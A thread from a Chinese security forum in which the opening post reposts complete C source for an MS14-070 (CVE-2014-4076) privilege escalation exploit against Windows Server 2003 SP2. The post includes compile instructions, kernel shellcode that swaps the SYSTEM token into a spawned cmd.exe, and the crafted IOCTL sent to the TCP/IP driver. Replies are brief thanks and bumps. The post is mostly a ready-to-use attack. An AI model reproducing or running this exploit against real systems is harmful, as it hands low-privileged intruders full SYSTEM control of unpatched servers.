查看: 39324|回复: 417

Windows 2k3 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070) Exploit

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-8-16 11:12:59 | 显示全部楼层 |阅读模式
    CVE: 2014-4076

    [C] 纯文本查看 复制代码
    /*
    ################################################################
    # Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070)
    # Date: 2015-08-10
    # Exploit Author: Tomislav Paskalev
    # Vulnerable Software:
    #   Windows 2003 SP2 x86
    #   Windows 2003 SP2 x86-64
    #   Windows 2003 SP2 IA-64
    # Supported vulnerable software:
    #   Windows 2003 SP2 x86
    # Tested on:
    #   Windows 2003 SP2 x86 EN
    # CVE ID:   2014-4076
    # OSVDB-ID: 114532
    ################################################################
    # Vulnerability description:
    #   Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to
    #   properly handle objects in memory during IOCTL processing.
    #   By crafting an input buffer that will be passed to the TCP
    #   device through the DeviceIoControlFile() function, it is
    #   possible to trigger a vulnerability that would allow an
    #   attacker to elevate privileges.
    #   An attacker who successfully exploited this vulnerability
    #   could run arbitrary code in kernel mode (i.e. with SYSTEM
    #   privileges).
    ################################################################
    # Exploit notes:
    #   Privileged shell execution:
    #     - the SYSTEM shell will spawn within the existing shell
    #       (i.e. exploit usable via a remote shell)
    #       - upon exiting the SYSTEM shell, the parent process
    #         will become unresponsive/hang
    #   Exploit compiling:
    #     - # i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe
    #   Exploit prerequisites:
    #     - low privilege access to the target (remote shell or RDP)
    #     - target not patched (KB2989935 not installed)
    ################################################################
    # Patch:
    #   [url]https://www.microsoft.com/en-us/download/details.aspx?id=44646[/url]
    ################################################################
    # Thanks to:
    #   KoreLogic (Python PoC)
    #   ChiChou (C++ PoC)
    ################################################################
    # References:
    #   [url]http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076[/url]
    #   [url]https://technet.microsoft.com/library/security/ms14-070[/url]
    #   [url]https://www.exploit-db.com/exploits/35936/[/url]
    #   [url]https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp[/url]
    #   [url]https://www.osronline.com/article.cfm?article=229[/url]
    ################################################################
    */
      
      
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
      
      
      
      
    typedef enum _SYSTEM_INFORMATION_CLASS {
            SystemBasicInformation                = 0,
            SystemPerformanceInformation          = 2,
            SystemTimeOfDayInformation            = 3,
            SystemProcessInformation              = 5,
            SystemProcessorPerformanceInformation = 8,
            SystemInterruptInformation            = 23,
            SystemExceptionInformation            = 33,
            SystemRegistryQuotaInformation        = 37,
            SystemLookasideInformation            = 45
    } SYSTEM_INFORMATION_CLASS;
      
      
    typedef DWORD NTSTATUS;
    NTSTATUS WINAPI NtQuerySystemInformation (
            SYSTEM_INFORMATION_CLASS   SystemInformationClass,
            PVOID                      SystemInformation,
            ULONG                      SystemInformationLength,
            PULONG                     ReturnLength
    );
      
      
    typedef struct _IO_STATUS_BLOCK {
            union {
                    NTSTATUS           Status;
                    PVOID              Pointer;
            };
            ULONG_PTR                  Information;
    } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;
      
      
    typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG);
      
      
    NTSTATUS (WINAPI *ZwAllocateVirtualMemory) (
            HANDLE                     ProcessHandle,
            PVOID                      *BaseAddress,
            ULONG_PTR                  ZeroBits,
            PSIZE_T                    RegionSize,
            ULONG                      AllocationType,
            ULONG                      Protect
    );
      
      
    NTSTATUS (WINAPI *ZwDeviceIoControlFile) (
            HANDLE                     FileHandle,
            PVOID                      ApcContext,
            PIO_STATUS_BLOCK           IoStatusBlock,
            ULONG                      IoControlCode,
            PVOID                      InputBuffer,
            ULONG                      InputBufferLength,
            PVOID                      OutputBuffer,
            ULONG                      OutputBufferLength
    );
      
      
      
      
    BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
    {
            ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
            startupInformation->cb = sizeof (STARTUPINFO);
            ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));
      
            // Start the child process.
            return CreateProcess (
                    NULL,                                                           // No module name (use command line)
                    "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32",   // Start cmd.exe
                    NULL,                                                           // Process handle not inheritable
                    NULL,                                                           // Thread handle not inheritable
                    TRUE,                                                           // Set handle inheritance to TRUE
                    0,                                                              // No creation flags
                    NULL,                                                           // Use parent's environment block
                    NULL,                                                           // Use parent's starting directory
                    &startupInformation[0],                                         // Pointer to STARTUPINFO structure
                    &processInformation[0]                                          // Pointer to PROCESS_INFORMATION structure
            );
    }
      
      
      
      
    unsigned long SwapBytes (unsigned long inputByteUL)
    {
            return (((inputByteUL&0x000000FF) << 24) + ((inputByteUL&0x0000FF00) << 8) +
            ((inputByteUL&0x00FF0000) >> 8) + ((inputByteUL&0xFF000000) >> 24));
    }
      
      
      
      
    BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
    {
            int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5;
      
            returnAllocMemValue1 = WriteProcessMemory (
                    (HANDLE) 0xFFFFFFFF,
                    (LPVOID) 0x28,
                    "\x87\xff\xff\x38",
                    4,
                    NULL
            );
            returnAllocMemValue2 = WriteProcessMemory (
                    (HANDLE) 0xFFFFFFFF,
                    (LPVOID) 0x38,
                    "\x00\x00",
                    2,
                    NULL
            );
            returnAllocMemValue3 = WriteProcessMemory (
                    (HANDLE) 0xFFFFFFFF,
                    (LPVOID) 0x1100,
                    &exploitBuffer[0],
                    32,
                    NULL
            );
            returnAllocMemValue4 = WriteProcessMemory (
                    (HANDLE) 0xFFFFFFFF,
                    (LPVOID) 0x2b,
                    "\x00\x00",
                    2,
                    NULL
            );
            returnAllocMemValue5 = WriteProcessMemory (
                    (HANDLE) 0xFFFFFFFF,
                    (LPVOID) 0x2000,
                    &shellcode[0],
                    96,
                    NULL
            );
      
            if (returnAllocMemValue1 == 0 ||
            returnAllocMemValue2 == 0 ||
            returnAllocMemValue3 == 0 ||
            returnAllocMemValue4 == 0 ||
            returnAllocMemValue5 == 0)
                    return FALSE;
            else
                    return TRUE;
    }
      
      
      
      
    int main (void)
    {
            fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
            fprintf (stderr, "    [*] by Tomislav Paskalev\n");
            fflush (stderr);
      
      
            ////////////////////////////////
            // CREATE NEW CME.EXE PROCESS
            ////////////////////////////////
      
            STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO));
            PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION));
      
            if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
            {
                    fprintf (stderr, "[-] Creating a new process failed\n");
                    fprintf (stderr, "    [*] Error code   : %d\n", GetLastError());
                    fflush (stderr);
                    ExitProcess (1);
            }
      
            fprintf (stderr, "[+] Created a new cmd.exe process\n");
            fflush (stderr);
      
      
            ////////////////////////////////
            // CONVERT PID TO HEX LE
            ////////////////////////////////
      
            unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
            fprintf (stderr, "    [*] PID [dec]    :   %#8lu\n", (unsigned long) processInformation->dwProcessId);
            fprintf (stderr, "    [*] PID [hex]    : %#010x\n", (unsigned long) processInformation->dwProcessId);
            fprintf (stderr, "    [*] PID [hex LE] : %#010x\n", pidLittleEndian);
      
            /*four bytes of hex = 8 characters, plus NULL terminator*/
            unsigned char pidLittleEndianString[9];
      
            sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);
      
      
            ////////////////////////////////
            // CREATE SHELLCODE
            ////////////////////////////////
      
            unsigned char exploitBuffer[] =
            "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
            "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
            unsigned char shellcode[] =
            "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
            "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
            "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
            "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
            "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
            "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
      
            int counter;
            for (counter = 0; counter < 4; counter++)
            {
                    char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0};
                    shellcode[46 + counter] = strtol (buffer, NULL, 16);
            }
      
            shellcode[77] = strtol ("39", NULL, 16);
            shellcode[78] = strtol ("ff", NULL, 16);
            shellcode[79] = strtol ("a2", NULL, 16);
            shellcode[80] = strtol ("ba", NULL, 16);
      
            shellcode[82] = strtol ("0", NULL, 16);
            shellcode[83] = strtol ("0", NULL, 16);
            shellcode[84] = strtol ("0", NULL, 16);
            shellcode[85] = strtol ("0", NULL, 16);
      
            fprintf (stderr, "[+] Modified shellcode\n");
            fflush (stderr);
      
      
            ////////////////////////////////
            // CREATE HANDLE ON TCPIP.SYS
            ////////////////////////////////
      
            HANDLE tcpIPDeviceHandle = CreateFileA (
                    "\\\\.\\Tcp",
                    0,
                    0,
                    NULL,
                    OPEN_EXISTING,
                    0,
                    NULL
            );
      
            if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
            {
                    printf ("[-] Opening TCP/IP I/O dev failed\n");
                    printf ("    [*] Error code   : %d\n", GetLastError());
                    ExitProcess (1);
            }
      
            fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
            fflush (stderr);
      
      
            ////////////////////////////////
            // ALLOCATE MEMORY - FIRST PAGE
            ////////////////////////////////
      
            FARPROC ZwAllocateVirtualMemory;
      
            ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
      
            fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
            fflush (stderr);
      
            NTSTATUS AllocMemReturnCode;
            ULONG BaseAddress = 0x1000, RegionSize = 0x4000;
      
            AllocMemReturnCode = ZwAllocateVirtualMemory (
                    (HANDLE) 0xFFFFFFFF,
                    &BaseAddress,
                    0,
                    &RegionSize,
                    MEM_COMMIT | MEM_RESERVE,
                    PAGE_EXECUTE_READWRITE
            );
      
            if (AllocMemReturnCode != 0)
            {
                    printf ("[-] Allocating memory failed\n");
                    printf ("    [*] Error code   : %#X\n", AllocMemReturnCode);
                    ExitProcess (1);
            }
      
            fprintf (stderr, "[+] Allocated memory\n");
            fprintf (stderr, "    [*] BaseAddress  : 0x%p\n", BaseAddress);
            fprintf (stderr, "    [*] RegionSize   : %#010x\n", RegionSize);
            fflush (stderr);
      
      
            ////////////////////////////////
            // WRITE EXPLOIT TO PROCESS MEM
            ////////////////////////////////
      
            fprintf (stderr, "[*] Writing exploit...\n");
            fflush (stderr);
      
            if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
            {
                    fprintf (stderr, "    [-] Failed to write to memory\n");
                    fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
                    fflush (stderr);
                    ExitProcess (1);
            }
            else
            {
                    fprintf (stderr, "    [+] done\n");
                    fflush (stderr);
            }
      
      
            ////////////////////////////////
            // SEND EXPLOIT TO TCPIP.SYS
            ////////////////////////////////
      
            fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
            fprintf (stderr, "    [*] Parent proc hangs on exit\n");
            fflush (stderr);
      
            FARPROC ZwDeviceIoControlFile;
            NTSTATUS DevIoCtrlReturnCode;
            ULONG ioStatus = 8;
      
            ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
      
            DevIoCtrlReturnCode = ZwDeviceIoControlFile (
                    tcpIPDeviceHandle,
                    NULL,
                    NULL,
                    NULL,
                    (PIO_STATUS_BLOCK) &ioStatus,
                    0x00120028,                                //Device: NETWORK (0x12)
                                                            //Function: 0xa
                                                            //Access: FILE_ANY_ACCESS
                                                            //Method: METHOD_BUFFERED
                    (PVOID) 0x1100,                                //NULL,                //Test
                    32,                                        //0,                //Test
                    NULL,
                    0
            );
      
            if (DevIoCtrlReturnCode != 0)
            {
                    fprintf (stderr, "    [-] Exploit failed (->TCP/IP)\n");
                    fprintf (stderr, "        [*] Err code : %d\n", GetLastError ());
                    fflush (stderr);
                    ExitProcess (1);
            }
      
      
            ////////////////////////////////
            // WAIT FOR CHILD PROCESS; EXIT
            ////////////////////////////////
      
            // Wait until child process exits.
            WaitForSingleObject (processInformation->hProcess, INFINITE);
      
            fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
            fflush (stderr);
      
            // Close process and thread handles.
            CloseHandle (tcpIPDeviceHandle);
            CloseHandle (processInformation->hProcess);
            CloseHandle (processInformation->hThread);
      
            return 1;
    }
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-8-17 00:59:07 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2022-10-21 10:32
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2015-8-17 04:44:09 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-24 10:52
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-8-17 16:56:03 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-19 03:55:05 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-19 16:24:44 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-20 14:16:59 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-20 19:00:36 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-21 11:46:49 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-8-23 09:06:47 | 显示全部楼层
    支持中国红客联盟(ihonker.org)
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 00:23 , Processed in 0.035867 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部